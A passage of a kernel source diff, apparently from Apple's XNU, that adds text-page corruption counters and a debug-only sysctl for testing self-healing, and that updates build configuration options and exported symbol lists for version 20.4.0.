vmtc_not_eligible, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_not_eligible, 0, "text page corruptions not eligible for 
correction"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_copyin_fail, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_copyin_fail, 0, "undiagnosed text page corruptions due to copyin failure"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_not_found, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_not_found, 0, "text page corruptions but no diff found"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_one_bit_flip, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_one_bit_flip, 0, "text page corruptions that had a single bit flip"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_1_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[0], 0, "text page corruptions with 1 changed byte"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_2_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[1], 0, "text page corruptions with 2 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_4_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[2], 0, "text page corruptions with 3 to 4 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_8_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[3], 0, "text page corruptions with 5 to 8 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_16_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[4], 0, "text page corruptions with 9 to 16 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_32_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[5], 0, "text page corruptions with 17 to 32 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_64_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[6], 0, "text page corruptions with 33 to 64 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_128byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[7], 0, "text page corruptions with 65 to 128 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_256_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[8], 0, "text page corruptions with >128 changed bytes"); + +#if DEBUG || DEVELOPMENT +/* + * A sysctl that can be used to corrupt a text page with an illegal instruction. + * Used for testing text page self healing. 
+ */ +extern kern_return_t vm_corrupt_text_addr(uintptr_t); +static int +corrupt_text_addr(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) +{ + uint64_t value = 0; + int error = sysctl_handle_quad(oidp, &value, 0, req); + if (error || !req->newptr) { + return error; + } + + if (vm_corrupt_text_addr((uintptr_t)value) == KERN_SUCCESS) { + return 0; + } else { + return EINVAL; + } +} + +SYSCTL_PROC(_vm, OID_AUTO, corrupt_text_addr, + CTLTYPE_QUAD | CTLFLAG_WR | CTLFLAG_LOCKED | CTLFLAG_MASKED, + 0, 0, corrupt_text_addr, "-", ""); +#endif /* DEBUG || DEVELOPMENT */ diff --git a/bsd/vm/vnode_pager.c b/bsd/vm/vnode_pager.c index b4d6d6fc6..fc3426fd5 100644 --- a/bsd/vm/vnode_pager.c +++ b/bsd/vm/vnode_pager.c @@ -56,7 +56,6 @@ #include #include -#include #include #include #include diff --git a/config/BSDKernel.exports b/config/BSDKernel.exports index f439a52cd..fc2945bab 100644 --- a/config/BSDKernel.exports +++ b/config/BSDKernel.exports @@ -569,7 +569,6 @@ _sysctl__machdep_children _sysctl__net_children _sysctl__sysctl_children _sysctl__vfs_children -_sysctl__vfs_generic _sysctl__vfs_generic_children _sysctl__vm_children _sysctl_handle_int diff --git a/config/IOKit.exports b/config/IOKit.exports index cdf84e788..f782bc540 100644 --- a/config/IOKit.exports +++ b/config/IOKit.exports @@ -880,6 +880,7 @@ __ZN18IOMemoryDescriptor13removeMappingEP11IOMemoryMap __ZN18IOMemoryDescriptor15getDMAMapLengthEPy __ZN18IOMemoryDescriptor15getDescriptorIDEv __ZN18IOMemoryDescriptor16getPreparationIDEv +__ZN18IOMemoryDescriptor16setPreparationIDEv __ZN18IOMemoryDescriptor17_CopyState_InvokeE5IORPCP15OSMetaClassBasePFiS2_P17_IOMDPrivateStateE __ZN18IOMemoryDescriptor18getPhysicalAddressEv __ZN18IOMemoryDescriptor20CreateMapping_InvokeE5IORPCP15OSMetaClassBasePFiS2_yyyyyPP11IOMemoryMapE @@ -1341,6 +1342,8 @@ __ZN29IOInterleavedMemoryDescriptorD2Ev __ZN29IOInterleavedMemoryDescriptordlEPvm __ZN29IOInterleavedMemoryDescriptornwEm 
__ZN6IOPMGR10gMetaClassE +__ZN6IOPMGR13enableCPUCoreEj +__ZN6IOPMGR13enableCPUCoreEjy __ZN6IOPMGRC2EPK11OSMetaClass __ZN6IOPMGRD2Ev __ZN6IOPMGRdlEPvm @@ -1473,6 +1476,7 @@ __ZN9IOService20callPlatformFunctionEPKcbPvS2_S2_S2_ __ZN9IOService20getDeviceMemoryCountEv __ZN9IOService20powerOverrideOffPrivEv __ZN9IOService20unlockForArbitrationEv +__ZN9IOService20ClientCrashed_InvokeE5IORPCP15OSMetaClassBasePFiS2_PS_yE __ZN9IOService21CopyProperties_InvokeE5IORPCP15OSMetaClassBasePFiS2_PP12OSDictionaryE __ZN9IOService21SearchProperty_InvokeE5IORPCP15OSMetaClassBasePFiS2_PKcS4_yPP8OSObjectE __ZN9IOService21getClientWithCategoryEPK8OSSymbol diff --git a/config/Libkern.exports b/config/Libkern.exports index 8e67942f2..eb6d0f438 100644 --- a/config/Libkern.exports +++ b/config/Libkern.exports @@ -690,6 +690,7 @@ _copyin _copyinstr _copyout _copyoutstr +_coretrust_interface_register _crc32 _debug_ivars_size _deflate diff --git a/config/MASTER b/config/MASTER index 3e8381e78..8beac4230 100644 --- a/config/MASTER +++ b/config/MASTER @@ -293,9 +293,9 @@ options CONFIG_MFCTBLSIZ=16 # # # configurable kernel message buffer size # -options CONFIG_MSG_BSIZE_REL=4096 # -options CONFIG_MSG_BSIZE_DEV=4096 # -options CONFIG_MSG_BSIZE_REL=16384 # +options CONFIG_MSG_BSIZE_REL=16384 # +options CONFIG_MSG_BSIZE_DEV=131072 # +options CONFIG_MSG_BSIZE_REL=131072 # options CONFIG_MSG_BSIZE_DEV=131072 # options CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_REL # options CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV # @@ -306,6 +306,12 @@ options CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV # options CONFIG_IPC_TABLE_ENTRIES_STEPS=64 # 137898 entries # options CONFIG_IPC_TABLE_ENTRIES_STEPS=256 # 300714 entries # +# +# maximum copyout size for IPC debugging tools +# +options CONFIG_IPC_KERNEL_MAP_SIZE=16 # 16M # +options CONFIG_IPC_KERNEL_MAP_SIZE=64 # 64M # + # # configurable kernel - use these options to strip strings from panic # and printf calls. 
@@ -573,11 +579,6 @@ options CONFIG_KAS_INFO # kas_info support # # # MACH configuration options. # -# TASK_SWAPPER enables code that manages demand for physical memory by -# forcibly suspending tasks when the demand exceeds supply. This -# option should be on. -# -options TASK_SWAPPER # # # This defines configuration options that are normally used only during @@ -607,7 +608,6 @@ options MACH_VM_DEBUG # # # hardclock device driver. # options MACH_MP_DEBUG # # -options CONFIG_ZCACHE # Enable per-cpu caching for zones # options CONFIG_ZLEAKS # Live zone leak debugging # # @@ -650,10 +650,6 @@ options KPC # options PGO # -# MACH_COUNTERS enables code that handles various counters in the system. -# -options MACH_COUNTERS # # - # DEVELOPMENT define for development builds options DEVELOPMENT # dev kernel # @@ -742,6 +738,7 @@ options CONFIG_SERIAL_KDP # KDP over serial # options CONFIG_KDP_INTERACTIVE_DEBUGGING # options CONFIG_TASKWATCH +options CONFIG_USER_NOTIFICATION # # # Kernel Power On Self Tests # @@ -752,11 +749,6 @@ options CONFIG_XNUPOST # # options PROC_REF_DEBUG # -# -# Kernel OS reason debug instrumentation -# -options OS_REASON_DEBUG # - # # Kernel Voucher Attr Manager for Activity Trace # @@ -772,6 +764,9 @@ options CONFIG_SYSDIAGNOSE # options CONFIG_CSR # options CONFIG_CSR_FROM_DT # +# Enable collection of IO Compression statistics +options CONFIG_IO_COMPRESSION_STATS # + # # Console options # diff --git a/config/MASTER.arm b/config/MASTER.arm index 0dbf52e8f..d5a077c24 100644 --- a/config/MASTER.arm +++ b/config/MASTER.arm @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm xsmall msgb_small config_embedded config_enforce_signed_code config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert 
config_xnupost proc_ref_debug os_reason_debug ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] @@ -50,7 +50,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace zleaks kdp_interactive_debugging interrupt_masked_debug ] -# MACH_BASE = [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct ] +# MACH_BASE = [ mach slidable vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_library_validation config_iosched config_telemetry config_sysdiagnose config_quiesce_counter phys_write_acct config_io_compression_stats ] # MACH_RELEASE = [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MASTER.arm64 b/config/MASTER.arm64 index 15846736a..e8e1a0f56 100644 --- a/config/MASTER.arm64 +++ b/config/MASTER.arm64 @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = 
[ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] @@ -52,7 +52,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] -# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct ] +# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter phys_write_acct config_io_compression_stats ] # MACH_RELEASE = [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max 
importance_debug ] diff --git a/config/MASTER.arm64.BridgeOS b/config/MASTER.arm64.BridgeOS index 3fd4f903c..825b89919 100644 --- a/config/MASTER.arm64.BridgeOS +++ b/config/MASTER.arm64.BridgeOS @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] diff --git a/config/MASTER.arm64.MacOSX b/config/MASTER.arm64.MacOSX index 509472214..bdd95c53c 100644 --- a/config/MASTER.arm64.MacOSX +++ b/config/MASTER.arm64.MacOSX @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 medium msgb_large config_arrow config_requires_u32_munging config_delay_idle_sleep config_proc_udata_storage config_uexc config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE 
development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_personas ] # BSD_RELEASE = [ BSD_BASE ] @@ -40,7 +40,11 @@ # VPN = [ ipsec flow_divert necp content_filter ] # PF = [ pf pflog ] # MULTIPATH = [ multipath mptcp ] +#if defined(SOC_CONFIG_t8020) # HIBERNATION = [ ] +#else /*!(defined(SOC_CONFIG_t8020)*/ +# HIBERNATION = [ ] +#endif /*!(defined(SOC_CONFIG_t8020)*/ # IOKIT_BASE = [ iokit iokitcpp no_kernel_hid config_sleep iokitstats HIBERNATION ] # IOKIT_RELEASE = [ IOKIT_BASE ] # IOKIT_DEV = [ IOKIT_BASE iotracking ] @@ -53,7 +57,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats zleaks alternate_debugger interrupt_masked_debug ] -# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz ] +# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_arm_pfz config_user_notification phys_write_acct ] # MACH_RELEASE = [ MACH_BASE debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git 
a/config/MASTER.arm64.bcm2837 b/config/MASTER.arm64.bcm2837 index e1d6bfd92..4ce67ae91 100644 --- a/config/MASTER.arm64.bcm2837 +++ b/config/MASTER.arm64.bcm2837 @@ -17,9 +17,9 @@ # -------- ----- -- --------------- # # ARM_EXTRAS_BASE = [ nos_arm_pmap nos_arm_asm ] -# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging config_zcache ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_requires_u32_munging ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] diff --git a/config/MASTER.arm64.iPhoneOS b/config/MASTER.arm64.iPhoneOS index 98852a7f7..f16f3b906 100644 --- a/config/MASTER.arm64.iPhoneOS +++ b/config/MASTER.arm64.iPhoneOS @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ arm64 xsmall msgb_large config_embedded config_enforce_signed_code config_requires_u32_munging config_zcache config_darkboot ARM_EXTRAS_BASE ] +# KERNEL_BASE = [ arm64 xsmall msgb_small config_embedded config_enforce_signed_code config_requires_u32_munging config_darkboot ARM_EXTRAS_BASE ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug pgtrace ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug pgtrace ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug 
config_waitq_stats config_workloop_debug config_waitq_debug pgtrace ] # BSD_BASE = [ mach_bsd config_workqueue psynch config_proc_uuid_policy config_personas config_imageboot config_imageboot_img4 ] # BSD_RELEASE = [ BSD_BASE no_printf_str no_kprintf_str secure_kernel ] @@ -52,7 +52,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ist_kdebug ] # PERF_DBG_DEV = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE config_dtrace lock_stats zleaks kdp_interactive_debugging alternate_debugger interrupt_masked_debug ] -# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter ] +# MACH_BASE = [ mach slidable config_ecc_logging vc_progress_white mdebug ipc_debug importance_inheritance config_atm config_coalitions config_iosched config_library_validation config_sysdiagnose config_telemetry config_mach_bridge_recv_time config_quiesce_counter config_io_compression_stats phys_write_acct ] # MACH_RELEASE = [ MACH_BASE config_skip_precise_user_kernel_time debugger_for_zone_info ] # MACH_DEV = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info config_io_accounting importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MASTER.x86_64 b/config/MASTER.x86_64 index 31d87fd6f..7bae7f33b 100644 --- a/config/MASTER.x86_64 +++ b/config/MASTER.x86_64 @@ -16,9 +16,9 @@ # Standard Apple OS Configurations: # -------- ----- -- --------------- # -# KERNEL_BASE = [ intel medium msgb_large config_requires_u32_munging config_zcache config_delay_idle_sleep config_proc_udata_storage vsprintf ] +# KERNEL_BASE = [ intel medium msgb_large config_requires_u32_munging config_delay_idle_sleep 
config_proc_udata_storage vsprintf ] # KERNEL_RELEASE = [ KERNEL_BASE ] -# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug os_reason_debug ] +# KERNEL_DEV = [ KERNEL_BASE development mach_assert config_xnupost proc_ref_debug ] # KERNEL_DEBUG = [ KERNEL_BASE debug mach_assert config_xnupost config_ltable_stats config_ltable_debug config_waitq_stats config_workloop_debug config_waitq_debug ] # BSD_BASE = [ mach_bsd sysv_sem sysv_msg sysv_shm config_netboot config_imageboot config_imageboot_chunklist config_workqueue psynch config_proc_uuid_policy config_coredump pgo config_32bit_telemetry config_personas ] # BSD_RELEASE = [ BSD_BASE ] @@ -48,7 +48,7 @@ # PERF_DBG_RELEASE=[ PERF_DBG_BASE ] # PERF_DBG_DEV =[ PERF_DBG_BASE lock_stats ] # PERF_DBG_DEBUG = [ PERF_DBG_BASE lock_stats ] -# MACH_BASE = [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct ] +# MACH_BASE = [ mach config_kext_basement mdebug ipc_debug config_mca config_vmx config_mtrr config_lapic config_telemetry importance_inheritance config_atm config_coalitions hypervisor config_iosched config_sysdiagnose config_mach_bridge_send_time copyout_shim phys_write_acct config_user_notification ] # MACH_RELEASE = [ MACH_BASE ] # MACH_DEV = [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max ] # MACH_DEBUG = [ MACH_BASE task_zone_info importance_trace config_ledger_interval_max importance_debug ] diff --git a/config/MasterVersion b/config/MasterVersion index 7da98bbff..11d867f00 100644 --- a/config/MasterVersion +++ b/config/MasterVersion @@ -1,4 +1,4 @@ -20.3.0 +20.4.0 # The first line of this file contains the master version number for the kernel. # All other instances of the kernel version in xnu are derived from this file. 
diff --git a/config/Private.arm.exports b/config/Private.arm.exports index 8091f7218..a3af4d729 100644 --- a/config/Private.arm.exports +++ b/config/Private.arm.exports @@ -13,6 +13,7 @@ _ml_get_conttime_offset _ml_get_wake_timebase _ml_set_reset_time _proc_getcdhash +_ml_cpu_init_completed _cpu_broadcast_xcall _cpu_xcall _cpu_broadcast_immediate_xcall diff --git a/config/Private.arm64.exports b/config/Private.arm64.exports index 1c0e13e39..09e5a5df7 100644 --- a/config/Private.arm64.exports +++ b/config/Private.arm64.exports @@ -41,6 +41,7 @@ _sched_perfcontrol_edge_matrix_set _sched_perfcontrol_update_callback_deadline _thread_group_join_io_storage _thread_group_join_perf_controller +_ml_cpu_init_completed _ml_cpu_signal _ml_cpu_signal_deferred _ml_cpu_signal_retract @@ -70,8 +71,6 @@ _pmap_iommu_map _pmap_iommu_unmap _pmap_iommu_iovmfree _pmap_iommu_ioctl -_pmap_iommu_grant_page -_pmap_iommu_alloc_contiguous_pages _nvme_ppl_get_desc _sart_get_desc _t8020dart_get_desc diff --git a/config/Private.exports b/config/Private.exports index 28b023dd9..71f343419 100644 --- a/config/Private.exports +++ b/config/Private.exports @@ -3,7 +3,6 @@ __ZN15IORegistryEntry18setIndexedPropertyEjP8OSObject __ZNK15IORegistryEntry18getIndexedPropertyEj __ZN16IOPlatformExpert* __ZNK16IOPlatformExpert* -__ZN18IOMemoryDescriptor16setPreparationIDEv __ZTV16IOPlatformExpert __ZN18IODTPlatformExpert* __ZNK18IODTPlatformExpert* @@ -149,6 +148,8 @@ _bufattr_markisochronous _bufattr_markmeta _bufattr_markquickcomplete _bufattr_meta +_bufattr_markexpeditedmeta +_bufattr_expeditedmeta _bufattr_nocache _bufattr_passive _bufattr_quickcomplete @@ -466,6 +467,10 @@ _kern_packet_append _kern_packet_get_next _kern_packet_set_chain_counts _kern_packet_get_chain_counts +_kern_packet_trace_start +_kern_packet_trace_end +_kern_packet_is_traced +_kern_packet_trace_event _kern_pbufpool_alloc _kern_pbufpool_alloc_batch _kern_pbufpool_alloc_batch_callback @@ -491,6 +496,7 @@ _kern_config_is_development 
_kern_stack_snapshot_with_reason _kernel_debug_string _kext_receipt +_kext_receipt_set_queried _kmem_alloc_kobject:_kmem_alloc_kobject_external _kmem_alloc_pageable:_kmem_alloc_pageable_external _kx_qsort @@ -598,6 +604,8 @@ _pmap_load_image4_trust_cache _pmap_lockdown_image4_slab _pmap_lookup_in_static_trust_cache _pmap_lookup_in_loaded_trust_caches +_pmap_set_compilation_service_cdhash +_pmap_match_compilation_service_cdhash _port_name_to_task _port_name_to_thread _post_sys_powersource @@ -621,6 +629,7 @@ _proc_set_syscall_filter_callbacks _proc_set_syscall_filter_index _proc_set_syscall_filter_mask _proc_selfcsflags +_proc_skip_mtime_update _proc_starttime _proc_task _proc_uniqueid @@ -717,6 +726,7 @@ _throttle_lowpri_io_will_be_throttled _throttle_lowpri_window _throttle_set_thread_io_policy _throttle_get_thread_effective_io_policy +_throttle_thread_io_tier_above_metadata _timeout _timeout_with_leeway _tk_nin @@ -751,10 +761,12 @@ _utun_ctl_register_dtls _utun_pkt_dtls_input _vfs_context_bind _vfs_context_can_resolve_triggers +_vfs_context_dataless_materialization_is_prevented _vfs_context_get_special_port _vfs_context_set_special_port _vfs_context_is_dataless_manipulator _vfs_devvp +_vfs_get_thread_fs_private _vfs_getattr _vfs_getbyid _vfs_is_basesystem @@ -762,6 +774,7 @@ _vfs_mntlabel _vfs_mount_id _vfs_nativexattrs _vfs_set_root_unmounted_cleanly +_vfs_set_thread_fs_private _vfs_setcompoundopen _vfs_throttle_mask _vfs_vnodecovered diff --git a/config/Private.x86_64.exports b/config/Private.x86_64.exports index 7983266f3..83401d90a 100644 --- a/config/Private.x86_64.exports +++ b/config/Private.x86_64.exports @@ -2,9 +2,10 @@ _IOGetBootKeyStoreData _IOGetAPFSKeyStoreData _IOSetAPFSKeyStoreData _IOGetARVRootHashData -_IOSetARVRootHashData _IOGetARVManifestData -_IOSetARVManifestData +_IOGetBaseSystemARVRootHashData +_IOGetBaseSystemARVManifestData +_IOBaseSystemARVRootHashAvailable __Z33IOSKCopyKextIdentifierWithAddressm 
__ZN14IOPMrootDomain17requestUserActiveEP9IOServicePKc __ZN14IOPMrootDomain20claimSystemBootEventEP9IOServicejPKcP8OSObject @@ -113,6 +114,7 @@ _hv_ast_pending _hv_disable _hv_ept_pmap_create _hv_get* +_hv_io_notifier* _hv_release* _hv_set* _hv_trace* diff --git a/config/Unsupported.arm64.MacOSX.exports b/config/Unsupported.arm64.MacOSX.exports index dbe250852..6ad33d6fd 100644 --- a/config/Unsupported.arm64.MacOSX.exports +++ b/config/Unsupported.arm64.MacOSX.exports @@ -34,3 +34,8 @@ __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert4Ev __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert5Ev __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert6Ev __ZN18IODTPlatformExpert28_RESERVEDIODTPlatformExpert7Ev +_KUNCExecute +_KUNCGetNotificationID +_KUNCUserNotificationDisplayAlert +_KUNCUserNotificationDisplayFromBundle +_KUNCUserNotificationDisplayNotice diff --git a/config/Unsupported.exports b/config/Unsupported.exports index d83a6923b..cb5770754 100644 --- a/config/Unsupported.exports +++ b/config/Unsupported.exports @@ -1,9 +1,4 @@ _Debugger -_KUNCExecute -_KUNCGetNotificationID -_KUNCUserNotificationDisplayAlert -_KUNCUserNotificationDisplayFromBundle -_KUNCUserNotificationDisplayNotice _NDR_record _OSSpinLockTry _OSSpinLockUnlock diff --git a/config/Unsupported.x86_64.MacOSX.exports b/config/Unsupported.x86_64.MacOSX.exports index 927f16da9..b49ffcab9 100644 --- a/config/Unsupported.x86_64.MacOSX.exports +++ b/config/Unsupported.x86_64.MacOSX.exports @@ -14,3 +14,8 @@ __ZN5IORTC15_RESERVEDIORTC4Ev __ZN5IORTC15_RESERVEDIORTC5Ev __ZN5IORTC15_RESERVEDIORTC6Ev __ZN5IORTC15_RESERVEDIORTC7Ev +_KUNCExecute +_KUNCGetNotificationID +_KUNCUserNotificationDisplayAlert +_KUNCUserNotificationDisplayFromBundle +_KUNCUserNotificationDisplayNotice diff --git a/config/generate_symbolset_plist.sh b/config/generate_symbolset_plist.sh index a56a15f2f..744ae9c6b 100755 --- a/config/generate_symbolset_plist.sh +++ b/config/generate_symbolset_plist.sh @@ -15,6 +15,11 @@ if [ 
